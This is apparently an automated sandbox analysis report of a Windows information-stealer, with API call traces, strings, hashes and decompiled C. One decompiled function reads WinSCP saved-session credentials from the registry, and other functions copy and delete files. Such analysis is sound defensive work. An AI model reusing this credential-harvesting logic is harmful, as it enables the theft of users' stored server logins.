0x00415223
0x00415230
0x00415240
0x00415252
0x00415259
0x0041525e
0x00415261
0x00415269
0x0041526b
0x0041526b
0x00415278
0x00415286
0x0041528b
0x00415298
0x004152a8
0x004152ba
0x004152c1
0x004152c6
0x004152c9
0x004152d1
0x004152d3
0x004152d3
0x004152e0
0x004152ee
0x004152f3
0x00415300
0x00415310
0x00415322
0x00415329
0x0041532e
0x00415331
0x00415339
0x0041533b
0x0041533b
0x00415348
0x00415356
0x0041535b
0x00415368
0x00415368
0x0041536d
0x00415372
0x00415375
0x0041537a
0x0041539c
0x004153b1
0x004153bc
0x004153c4
0x004153c5
0x004153d1

APIs

_memset.LIBCMT ref: 00414ADF

Part of subcall function 00420467: _malloc.LIBCMT ref: 00420481

_memset.LIBCMT ref: 00414B36

Part of subcall function 00414333: __EH_prolog3_GS.LIBCMT ref: 0041433D
Part of subcall function 00414333: _memset.LIBCMT ref: 0041437B
Part of subcall function 00414333: lstrcat.KERNEL32(?,00000000), ref: 00414393
Part of subcall function 00414333: lstrcat.KERNEL32(?), ref: 004143A1
Part of subcall function 00414333: _memset.LIBCMT ref: 004143B0
Part of subcall function 00414333: lstrcat.KERNEL32(?,?), ref: 004143C6
Part of subcall function 00414333: lstrcat.KERNEL32(?,0043D134), ref: 004143D8
Part of subcall function 00414333: lstrcat.KERNEL32(?), ref: 004143EB
Part of subcall function 00414333: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00414421

_memset.LIBCMT ref: 00414E69
_memset.LIBCMT ref: 00414E7A
_memset.LIBCMT ref: 00414E8B
lstrcat.KERNEL32(?,00000000), ref: 00414EA3
lstrcat.KERNEL32(?,0043D134), ref: 00414EB5
lstrcat.KERNEL32(?,0043FCB4), ref: 00414EC7
lstrcat.KERNEL32(?,0043F568), ref: 00414EDA
lstrcat.KERNEL32(?,0043F564), ref: 00414EEC
lstrcat.KERNEL32(?,0043F568), ref: 00414EFA
lstrcat.KERNEL32(?,0043FCB8), ref: 00414F0C
lstrcat.KERNEL32(?,0043FC9C), ref: 00414F1E
lstrcat.KERNEL32(?,0043F560), ref: 00414F30
lstrcat.KERNEL32(?,0043FCBC), ref: 00414F42
lstrcat.KERNEL32(?,0043F778), ref: 00414F54
lstrcat.KERNEL32(?,0043FCC0), ref: 00414F67
lstrcat.KERNEL32(?,0043F568), ref: 00414F75
lstrcat.KERNEL32(?,0043F570), ref: 00414F87
lstrcat.KERNEL32(?,0043FCC4), ref: 00414F99
lstrcat.KERNEL32(?,0043F56C), ref: 00414FAB
lstrcat.KERNEL32(?,0043FCA0), ref: 00414FBD
lstrcat.KERNEL32(?,0043FC98), ref: 00414FCF

Part of subcall function 0041212B: __EH_prolog3_GS.LIBCMT ref: 00412135
Part of subcall function 0041212B: _memset.LIBCMT ref: 0041216A
Part of subcall function 0041212B: _memset.LIBCMT ref: 0041217B
Part of subcall function 0041212B: lstrcat.KERNEL32(?,00000000), ref: 00412193
Part of subcall function 0041212B: lstrcat.KERNEL32(?), ref: 004121A6
Part of subcall function 0041212B: lstrcat.KERNEL32(?), ref: 004121B9
Part of subcall function 0041212B: lstrcat.KERNEL32(?,00000000), ref: 004121CF
Part of subcall function 0041212B: lstrcat.KERNEL32(?), ref: 004121E2
Part of subcall function 0041212B: lstrcat.KERNEL32(?,0043F684), ref: 004121F4

lstrcat.KERNEL32(?,0043D134), ref: 00414FE1
lstrcat.KERNEL32(?,0043FCC4), ref: 00414FF3
lstrcat.KERNEL32(?,0043F568), ref: 00415001
lstrcat.KERNEL32(?,0043FCC8), ref: 00415013
lstrcat.KERNEL32(?,0043F72C), ref: 00415025
lstrcat.KERNEL32(?,0043FCCC), ref: 00415037
lstrcat.KERNEL32(?,0043F560), ref: 0041504A
lstrcat.KERNEL32(?,0043F56C), ref: 0041505C
lstrcat.KERNEL32(?,0043F560), ref: 0041506A
lstrcat.KERNEL32(?,0043F570), ref: 0041507C
lstrcat.KERNEL32(?,0043FCC0), ref: 0041508A
lstrcat.KERNEL32(?,0043FCD0), ref: 0041509C
lstrcat.KERNEL32(?,0043FCD4), ref: 004150AF
lstrcat.KERNEL32(?,0043FCD4), ref: 004150BD
lstrcat.KERNEL32(?,0043FCD8), ref: 004150CF
lstrcat.KERNEL32(?,0043FCD4), ref: 004150DD
lstrcat.KERNEL32(?,0043FCD0), ref: 004150EF
lstrcat.KERNEL32(?,0043FCDC), ref: 00415102
lstrcat.KERNEL32(?,0043FCC0), ref: 00415110
lstrcat.KERNEL32(?,0043FCE0), ref: 00415122
lstrcat.KERNEL32(?,0043FCC0), ref: 00415130
lstrcat.KERNEL32(?,0043FCDC), ref: 0041513E
lstrcat.KERNEL32(?,0043FCE4), ref: 00415150
lstrcat.KERNEL32(?,0043FCD8), ref: 00415162

Part of subcall function 00412D82: __EH_prolog3_GS.LIBCMT ref: 00412D8C
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412DB5
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412DDB
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412DF2
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412E09
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412E1B
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412E2C
Part of subcall function 00412D82: _memset.LIBCMT ref: 00412E3D
Part of subcall function 00412D82: RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 00412E6B

Part of subcall function 00414903: _memset.LIBCMT ref: 00414938
Part of subcall function 00414903: _memset.LIBCMT ref: 0041494A
Part of subcall function 00414903: lstrcat.KERNEL32(?,00000000), ref: 00414962
Part of subcall function 00414903: lstrcat.KERNEL32(?,006E8650), ref: 00414970
Part of subcall function 00414903: lstrcat.KERNEL32(?,?), ref: 00414984
Part of subcall function 00414903: lstrcat.KERNEL32(?,..\), ref: 00414996
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043FC98), ref: 004149A8
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043FC9C), ref: 004149BA
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043FCA0), ref: 004149CC
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043FCA4), ref: 004149DE
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043FCA8), ref: 004149F0
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043F564), ref: 00414A02
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043F568), ref: 00414A14
Part of subcall function 00414903: lstrcat.KERNEL32(?,0043F570), ref: 00414A26
Part of subcall function 00414903: lstrcat.KERNEL32(?,.ini), ref: 00414A38
Part of subcall function 00414903: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00414A45

Part of subcall function 00411AD2: __EH_prolog3_GS.LIBCMT ref: 00411ADC
Part of subcall function 00411AD2: _memset.LIBCMT ref: 00411AF9
Part of subcall function 00411AD2: lstrcat.KERNEL32(?,00000000), ref: 00411B11
Part of subcall function 00411AD2: lstrcat.KERNEL32(?), ref: 00411B24
Part of subcall function 00411AD2: GetFileAttributesA.KERNELBASE(?,?,00000000), ref: 00411B31
Part of subcall function 00411AD2: _strlen.LIBCMT ref: 00411C20

lstrcat.KERNEL32(?,0043FCD0), ref: 00415174
lstrcat.KERNEL32(?,0043F688), ref: 00415186
lstrcat.KERNEL32(?,0043F684), ref: 00415198

Part of subcall function 00412548: wsprintfA.USER32 ref: 00412580
Part of subcall function 00412548: FindFirstFileA.KERNEL32(?,?), ref: 00412597
Part of subcall function 00412548: StrCmpCA.SHLWAPI(?,0043F354), ref: 004125BD
Part of subcall function 00412548: StrCmpCA.SHLWAPI(?,0043F358), ref: 004125D7
Part of subcall function 00412548: wsprintfA.USER32 ref: 004125F5
Part of subcall function 00412548: StrCmpCA.SHLWAPI(?,0043D12C), ref: 00412604
Part of subcall function 00412548: wsprintfA.USER32 ref: 00412621
Part of subcall function 00412548: PathMatchSpecA.SHLWAPI(?,?), ref: 00412645
Part of subcall function 00412548: _memset.LIBCMT ref: 00412661
Part of subcall function 00412548: lstrcat.KERNEL32(?), ref: 00412676
Part of subcall function 00412548: lstrcat.KERNEL32(?,?), ref: 0041268A
Part of subcall function 00412548: _memset.LIBCMT ref: 0041269E
Part of subcall function 00412548: lstrcat.KERNEL32(?), ref: 004126B3
Part of subcall function 00412548: lstrcat.KERNEL32(?,00000000), ref: 004126C9

Part of subcall function 00412548: wsprintfA.USER32 ref: 0041262F
Part of subcall function 00412548: CopyFileA.KERNEL32(?,?,00000001), ref: 004126DF
Part of subcall function 00412548: DeleteFileA.KERNEL32(?), ref: 0041270E
Part of subcall function 00412548: FindNextFileA.KERNEL32(?,?), ref: 00412740
Part of subcall function 00412548: FindClose.KERNEL32(?), ref: 00412754

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00404DB2: _strlen.LIBCMT ref: 00404DBF

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00415384
_memset.LIBCMT ref: 004153B1

Strings

A7FDF864F, xrefs: 0041524C
A92DAA6E, xrefs: 004152B4
ZHaZea, xrefs: 00414B78
A6F891F2*, xrefs: 0041529D
F8806DD0, xrefs: 0041531C
BC10B77*, xrefs: 00415235
C461824F*, xrefs: 00415305

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$File$H_prolog3_wsprintf$AttributesFind_strlen$CloseCopyDeleteFirstMatchNextOpenPathSpec_malloc_memmovelstrlen
String ID: A6F891F2*$A7FDF864F$A92DAA6E$BC10B77*$C461824F*$F8806DD0$ZHaZea
API String ID: 1107648404-1934749198
Opcode ID: 3dc0e3e025bfda4a2b0d5ebb0e0116e447228540ef0fde226a57d3af1850b8aa
Instruction ID: e092073406bf4129eede53460033e5fc613a7e69ea6196a7d1665359e2598c9e
Opcode Fuzzy Hash: 3dc0e3e025bfda4a2b0d5ebb0e0116e447228540ef0fde226a57d3af1850b8aa
Instruction Fuzzy Hash: DB32B3B6900218AFDB10DBA0DC85EEA777CFB4A304F1444BAF605E2161DB789786CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE4B Relevance: 82.5, APIs: 45, Strings: 2, Instructions: 293
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 0040FE55
StrCmpCA.SHLWAPI(?,00000264,00411794,?,?,?,?), ref: 0040FE8F
StrCmpCA.SHLWAPI(?,?,00000264,00411794,?,?,?,?), ref: 0040FEA0
StrCmpCA.SHLWAPI(?,?,?,00000264,00411794,?,?,?,?), ref: 0040FEBD
_memset.LIBCMT ref: 0040FEDB
lstrcat.KERNEL32(?,?), ref: 0040FEF0
lstrcat.KERNEL32(?,00000000), ref: 0040FF06
CopyFileA.KERNEL32(?,?,00000001), ref: 0040FF1B
_memset.LIBCMT ref: 0040FF2A
lstrcat.KERNEL32(?,0043D134), ref: 0040FF3F
lstrcat.KERNEL32(?), ref: 0040FF52
lstrcat.KERNEL32(?,0043D134), ref: 0040FF60
lstrcat.KERNEL32(?), ref: 0040FF6E
lstrcat.KERNEL32(?,0043F72C), ref: 0040FF80
lstrcat.KERNEL32(?,0043D12C), ref: 0040FF93
lstrcat.KERNEL32(?,.txt), ref: 0040FFA5
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FFF7
RtlAllocateHeap.NTDLL(00000000), ref: 0040FFFE
StrCmpCA.SHLWAPI(?,0043F324), ref: 004100AB
_memset.LIBCMT ref: 004100BE
_memset.LIBCMT ref: 004100CE
lstrcat.KERNEL32(?), ref: 004100E2
StrCmpCA.SHLWAPI(0043D12C,0043F324), ref: 004100EF
_memset.LIBCMT ref: 00410102
_memset.LIBCMT ref: 00410112

Part of subcall function 0040FA8C: __EH_prolog3_GS.LIBCMT ref: 0040FA93
Part of subcall function 0040FA8C: _memcmp.LIBCMT ref: 0040FABC
Part of subcall function 0040FA8C: _memset.LIBCMT ref: 0040FAE5
Part of subcall function 0040FA8C: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,000000FF,00000000,-0000000C,?,?,00000000), ref: 0040FB20

lstrcat.KERNEL32(0043D12C), ref: 00410126
_memset.LIBCMT ref: 0041013B
lstrcat.KERNEL32(?,0043F324), ref: 0041014A
lstrcat.KERNEL32(?,?), ref: 0041015C
lstrcat.KERNEL32(?,0043F730), ref: 00410169
lstrcat.KERNEL32(?,?), ref: 0041017B
lstrcat.KERNEL32(?,0043F730), ref: 00410188
lstrcat.KERNEL32(?,?), ref: 0041019A
lstrcat.KERNEL32(?,0043F730), ref: 004101A7
lstrcat.KERNEL32(?,0043D12C), ref: 004101B9
lstrcat.KERNEL32(?,0043F730), ref: 004101C6
lstrcat.KERNEL32(?,?), ref: 004101D8
lstrcat.KERNEL32(?,0043F730), ref: 004101E5
lstrcat.KERNEL32(?,?), ref: 004101F7
lstrcat.KERNEL32(?,0043F730), ref: 00410204
lstrcat.KERNEL32(?,00000000), ref: 00410258
lstrcat.KERNEL32(?,0043D130), ref: 0041027B
lstrlenA.KERNEL32(?), ref: 0041029D
_memset.LIBCMT ref: 004102CB
DeleteFileA.KERNEL32(?), ref: 004102F4

Strings

ZHaZea, xrefs: 00410010, 00410287
.txt, xrefs: 0040FF99

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileH_prolog3_Heap$AllocAllocateCopyDeleteLocalProcess_memcmplstrlen
String ID: .txt$ZHaZea
API String ID: 4185331878-3089687261
Opcode ID: 7bedf24b578e199b6e50d729f4358787a12f9f7b4460fc2b5f33ec1414be773a
Instruction ID: 5fb5e1a4ae3255b80af2edfea1daa923bec1283c6b3f3c80704c919d528d9488
Opcode Fuzzy Hash: 7bedf24b578e199b6e50d729f4358787a12f9f7b4460fc2b5f33ec1414be773a
Instruction Fuzzy Hash: 6AC15676804128ABDF21AFA0EC4DAEA7F79FB0A315F1004F5F609A2170DB754A91DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412D82 Relevance: 73.8, APIs: 39, Strings: 3, Instructions: 345
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00412D82(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				long _t134;
				intOrPtr* _t143;
				void* _t168;
				void* _t185;
				long _t189;
				void* _t200;
				intOrPtr _t203;
				intOrPtr* _t205;
				void* _t224;
				intOrPtr _t226;
				intOrPtr* _t230;
				short* _t232;
				void* _t234;
				void* _t235;
				void* _t242;

				_t225 = __edi;
				_t224 = __edx;
				_push(0xde8);
				E00423679(E00433EC1, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t234 - 0xdd4)) =  *((intOrPtr*)(_t234 + 8));
				 *(_t234 - 0xdd8) = 0;
				 *(_t234 - 0x11c) = 0;
				E0041F6B0(_t234 - 0x11b, 0, 0x103);
				 *(_t234 - 0xdd0) = 0x104;
				 *((char*)(_t234 - 0xd1c)) = 0;
				E0041F6B0(_t234 - 0xd1b, 0, 0x3ff);
				 *((char*)(_t234 - 0x91c)) = 0;
				E0041F6B0(_t234 - 0x91b, 0, 0x3ff);
				 *((char*)(_t234 - 0x51c)) = 0;
				E0041F6B0(_t234 - 0x51b, 0, 0x3ff);
				_t229 = 0x400;
				E0041F6B0(_t234 - 0xd1c, 0, 0x3ff);
				E0041F6B0(_t234 - 0x91c, 0, 0x3ff);
				E0041F6B0(_t234 - 0x51c, 0, 0x3ff);
				_t242 = _t235 + 0x54;
				 *((intOrPtr*)(_t234 - 0xde0)) = 0x3ff;
				 *((intOrPtr*)(_t234 - 0xdec)) = 0x3ff;
				 *((intOrPtr*)(_t234 - 0xddc)) = 0x3ff;
				_t134 = RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1, _t234 - 0xdc8); // executed
				if(_t134 != 0) {
					L27:
					return E004236C3(0, _t225, _t229);
				}
				E004049CF(_t234 - 0xd8c,  *0x447080);
				 *(_t234 - 4) = 0;
				E004049CF(_t234 - 0xd70,  *0x44725c);
				 *(_t234 - 4) = 1;
				_t230 = E00417DAA(_t234 - 0xd8c, _t234 - 0xd54);
				 *(_t234 - 4) = 2;
				_t143 = E00417DAA(_t234 - 0xd70, _t234 - 0xda8);
				 *(_t234 - 4) = 3;
				if( *((intOrPtr*)(_t230 + 0x14)) >= 8) {
					_t230 =  *_t230;
				}
				if( *((intOrPtr*)(_t143 + 0x14)) >= 8) {
					_t143 =  *_t143;
				}
				 *((char*)(_t234 - 0xdc9)) =  *0x447328( *(_t234 - 0xdc8), _t143, _t230, 0x10, 0, _t234 - 0xde8, _t234 - 0xdf4) != 0;
				_t225 = 0;
				E0040CE40(0, _t234 - 0xda8, 1);
				_t229 = _t234 - 0xd54;
				E0040CE40(0, _t234 - 0xd54, 1);
				E00404A66(_t234 - 0xd70, 1, 0);
				 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
				E00404A66(_t234 - 0xd8c, 1, 0);
				if( *((intOrPtr*)(_t234 - 0xdc9)) != 0 &&  *(_t234 - 0xdc8) != 0) {
					RegCloseKey( *(_t234 - 0xdc8));
					 *(_t234 - 0xdc8) = 0;
				}
				if( *((intOrPtr*)(_t234 - 0xde8)) == 0) {
					L11:
					if( *(_t234 - 0xdc8) != 0) {
						RegCloseKey( *(_t234 - 0xdc8));
						 *(_t234 - 0xdc8) = 0;
					}
					goto L13;
				} else {
					if( *(_t234 - 0xdc8) == 0) {
						L13:
						if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9, _t234 - 0xdc8) != 0) {
							goto L27;
						}
						if(RegEnumKeyExA( *(_t234 - 0xdc8), 0, _t234 - 0x11c, _t234 - 0xdd0, 0, 0, 0, 0) != 0) {
							L25:
							if( *(_t234 - 0xdc8) != 0) {
								RegCloseKey( *(_t234 - 0xdc8));
							}
							goto L27;
						} else {
							goto L15;
						}
						do {
							L15:
							_t225 =  *((intOrPtr*)(_t234 - 0xdd4));
							_t232 = "\n";
							 *0x4474e0(_t225, _t232);
							 *0x4474e0(_t225,  *0x446bfc);
							 *0x4474e0(_t225, _t232);
							 *0x4474e0(_t225,  *0x4471a0);
							 *0x4473c8( *(_t234 - 0xdc8), _t234 - 0x11c,  *0x446b5c, 2, 0, _t234 - 0xd1c, _t234 - 0xde0);
							 *0x4474e0(_t225, _t234 - 0xd1c);
							 *(_t234 - 0xde4) = 4;
							_t168 =  *0x4473c8( *(_t234 - 0xdc8), _t234 - 0x11c,  *0x446cc0, 0xffff, 0, _t234 - 0xdf0, _t234 - 0xde4);
							_t257 = _t168;
							if(_t168 != 0) {
								 *0x4474e0(_t225, ":22");
							} else {
								_push( *((intOrPtr*)(_t234 - 0xdf0)));
								_t205 = E00417C07(0, _t234 - 0xd54, _t224, _t225, _t232, _t257);
								 *(_t234 - 4) = 4;
								if( *((intOrPtr*)(_t205 + 0x14)) >= 0x10) {
									_t205 =  *_t205;
								}
								 *0x4474e0(_t225, _t205);
								 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
								E00404A66(_t234 - 0xd54, 1, 0);
							}
							 *0x4474e0(_t225, _t232);
							 *0x4474e0(_t225,  *0x446c5c);
							 *0x4473c8( *(_t234 - 0xdc8), _t234 - 0x11c,  *0x447224, 2, 0, _t234 - 0x91c, _t234 - 0xdec);
							 *0x4474e0(_t225, _t234 - 0x91c);
							 *((intOrPtr*)(_t234 - 0xd24)) = 0xf;
							 *((intOrPtr*)(_t234 - 0xd28)) = 0;
							 *((char*)(_t234 - 0xd38)) = 0;
							 *(_t234 - 4) = 5;
							 *0x4473c8( *(_t234 - 0xdc8), _t234 - 0x11c,  *0x446dec, 2, 0, _t234 - 0x51c, _t234 - 0xddc);
							 *0x4474e0(_t225, _t232);
							 *0x4474e0(_t225,  *0x44715c);
							_t185 =  *0x447510(_t234 - 0x51c, 0x43d12c);
							_t259 = _t185;
							if(_t185 != 0) {
								_t200 = E0041286C(0, _t234 - 0x51c, _t224, _t225, _t232, _t259, _t234 - 0xdc4, _t234 - 0xd1c, _t234 - 0x91c);
								_t226 = _t234 - 0xd38;
								 *(_t234 - 4) = 6;
								E00404A22(_t226, _t200);
								 *(_t234 - 4) = 5;
								E00404A66(_t234 - 0xdc4, 1, 0);
								_t203 =  *((intOrPtr*)(_t234 - 0xd38));
								if( *((intOrPtr*)(_t234 - 0xd24)) < 0x10) {
									_t203 = _t226;
								}
								 *0x4474e0( *((intOrPtr*)(_t234 - 0xdd4)), _t203);
								_t225 =  *((intOrPtr*)(_t234 - 0xdd4));
							}
							 *0x4474e0(_t225, "\n\n");
							 *(_t234 - 0xdd8) =  *(_t234 - 0xdd8) + 1;
							 *(_t234 - 0xdd0) = 0x104;
							_t189 = RegEnumKeyExA( *(_t234 - 0xdc8),  *(_t234 - 0xdd8), _t234 - 0x11c, _t234 - 0xdd0, 0, 0, 0, 0);
							_t229 = _t189;
							E0041F6B0(_t234 - 0x91c, 0, 0);
							E0041F6B0(_t234 - 0xd38, 0, 0);
							E0041F6B0(_t234 - 0x51c, 0, 0);
							 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
							_t242 = _t242 + 0x24;
							E00404A66(_t234 - 0xd38, 1, 0);
						} while (_t189 != 0x103);
						goto L25;
					}
					RegCloseKey( *(_t234 - 0xdc8));
					 *(_t234 - 0xdc8) = 0;
					goto L11;
				}
			}

0x00412d82
0x00412d82
0x00412d82
0x00412d8c
0x00412d9b
0x00412da9
0x00412daf
0x00412db5
0x00412dcb
0x00412dd5
0x00412ddb
0x00412dec
0x00412df2
0x00412e03
0x00412e09
0x00412e11
0x00412e1b
0x00412e2c
0x00412e3d
0x00412e42
0x00412e59
0x00412e5f
0x00412e65
0x00412e6b
0x00412e73
0x004132a8
0x004132ad
0x004132ad
0x00412e85
0x00412e8a
0x00412e99
0x00412eab
0x00412eb4
0x00412ec3
0x00412ec7
0x00412ecc
0x00412ed4
0x00412ed6
0x00412ed6
0x00412edc
0x00412ede
0x00412ede
0x00412f01
0x00412f0a
0x00412f12
0x00412f19
0x00412f1f
0x00412f2d
0x00412f32
0x00412f3f
0x00412f4a
0x00412f5a
0x00412f60
0x00412f60
0x00412f6c
0x00412f88
0x00412f8e
0x00412f96
0x00412f9c
0x00412f9c
0x00000000
0x00412f6e
0x00412f74
0x00412fa2
0x00412fbe
0x00000000
0x00000000
0x00412fe5
0x00413294
0x0041329a
0x004132a2
0x004132a2
0x00000000
0x00000000
0x00000000
0x00000000
0x00412feb
0x00412feb
0x00412feb
0x00412ff1
0x00412ff8
0x00413005
0x0041300d
0x0041301a
0x00413044
0x00413052
0x0041307f
0x00413089
0x0041308f
0x00413091
0x004130d5
0x00413093
0x00413093
0x0041309f
0x004130a4
0x004130af
0x004130b1
0x004130b1
0x004130b5
0x004130bb
0x004130c8
0x004130c8
0x004130dd
0x004130ea
0x00413114
0x00413122
0x00413128
0x00413132
0x00413138
0x0041314f
0x00413169
0x00413171
0x0041317e
0x00413190
0x00413196
0x00413198
0x004131b5
0x004131bc
0x004131c2
0x004131c6
0x004131d4
0x004131d8
0x004131e4
0x004131ea
0x004131ec
0x004131ec
0x004131f5
0x004131fb
0x004131fb
0x00413207
0x0041320d
0x0041322b
0x0041323b
0x00413242
0x0041324c
0x0041325d
0x0041326e
0x00413273
0x00413277
0x00413283
0x00413288
0x00000000
0x00412feb
0x00412f7c
0x00412f82
0x00000000
0x00412f82

APIs

__EH_prolog3_GS.LIBCMT ref: 00412D8C
_memset.LIBCMT ref: 00412DB5
_memset.LIBCMT ref: 00412DDB
_memset.LIBCMT ref: 00412DF2
_memset.LIBCMT ref: 00412E09
_memset.LIBCMT ref: 00412E1B
_memset.LIBCMT ref: 00412E2C
_memset.LIBCMT ref: 00412E3D
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 00412E6B

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000104,?,?,?,00408FFE,?,?), ref: 00417DCB
Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00408FFE,?,?,?,?,?,0040939F), ref: 00417DFC

RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,?,?,?), ref: 00412EF9
RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00412F5A
RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00412F7C
RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00412F96
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00412FB6
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412FDD
lstrcat.KERNEL32(?,0043D130), ref: 00412FF8
lstrcat.KERNEL32(?), ref: 00413005
lstrcat.KERNEL32(?,0043D130), ref: 0041300D
lstrcat.KERNEL32(?), ref: 0041301A
RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?), ref: 00413044
lstrcat.KERNEL32(?,?), ref: 00413052
RegGetValueA.ADVAPI32 ref: 00413089
lstrcat.KERNEL32(?,00000000), ref: 004130B5
lstrcat.KERNEL32(?,:22), ref: 004130D5
lstrcat.KERNEL32(?,0043D130), ref: 004130DD
lstrcat.KERNEL32(?), ref: 004130EA
RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?), ref: 00413114
lstrcat.KERNEL32(?,?), ref: 00413122
RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?), ref: 00413169
lstrcat.KERNEL32(?,0043D130), ref: 00413171
lstrcat.KERNEL32(?), ref: 0041317E
StrCmpCA.SHLWAPI(?,0043D12C), ref: 00413190
lstrcat.KERNEL32(?,?), ref: 004131F5
lstrcat.KERNEL32(?,0043F4D8), ref: 00413207
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041323B
_memset.LIBCMT ref: 0041324C

Part of subcall function 00417C07: __EH_prolog3_GS.LIBCMT ref: 00417C11
Part of subcall function 00417C07: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417D14

_memset.LIBCMT ref: 0041325D
_memset.LIBCMT ref: 0041326E
RegCloseKey.ADVAPI32(?), ref: 004132A2

Strings

Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 00412FAC
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00412E4F
:22, xrefs: 004130CF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$Value$Close$ByteCharEnumH_prolog3_MultiOpenWide$Ios_base_dtor_strlenstd::ios_base::_
String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
API String ID: 103168691-2123096617
Opcode ID: 1cc29df1fe2b3224992fe11b5a14c2b1058afc068429596d7ef13ecdb2bc3450
Instruction ID: f11f1fa617da3503f1233f3625e982bce75234fb34105ae2a71d520dff2cd811
Opcode Fuzzy Hash: 1cc29df1fe2b3224992fe11b5a14c2b1058afc068429596d7ef13ecdb2bc3450
Instruction Fuzzy Hash: F2E11BB290011DAFEB219B90DC85EEA7B7CEF45305F0000E7E509A2161DB746F86DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00410302 Relevance: 52.7, APIs: 24, Strings: 6, Instructions: 188
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00410302(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t74;
				void* _t86;
				void* _t91;
				CHAR* _t95;
				void* _t96;
				CHAR* _t103;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr* _t118;
				CHAR* _t142;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void* _t152;

				_t152 = __eflags;
				E00423679(E00434020, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t143 - 0x248)) =  *((intOrPtr*)(_t143 + 8));
				 *((intOrPtr*)(_t143 - 0x24c)) =  *((intOrPtr*)(_t143 + 0xc));
				 *((intOrPtr*)(_t143 - 0x254)) =  *((intOrPtr*)(_t143 + 0x10));
				 *((intOrPtr*)(_t143 - 0x25c)) =  *((intOrPtr*)(_t143 + 0x14));
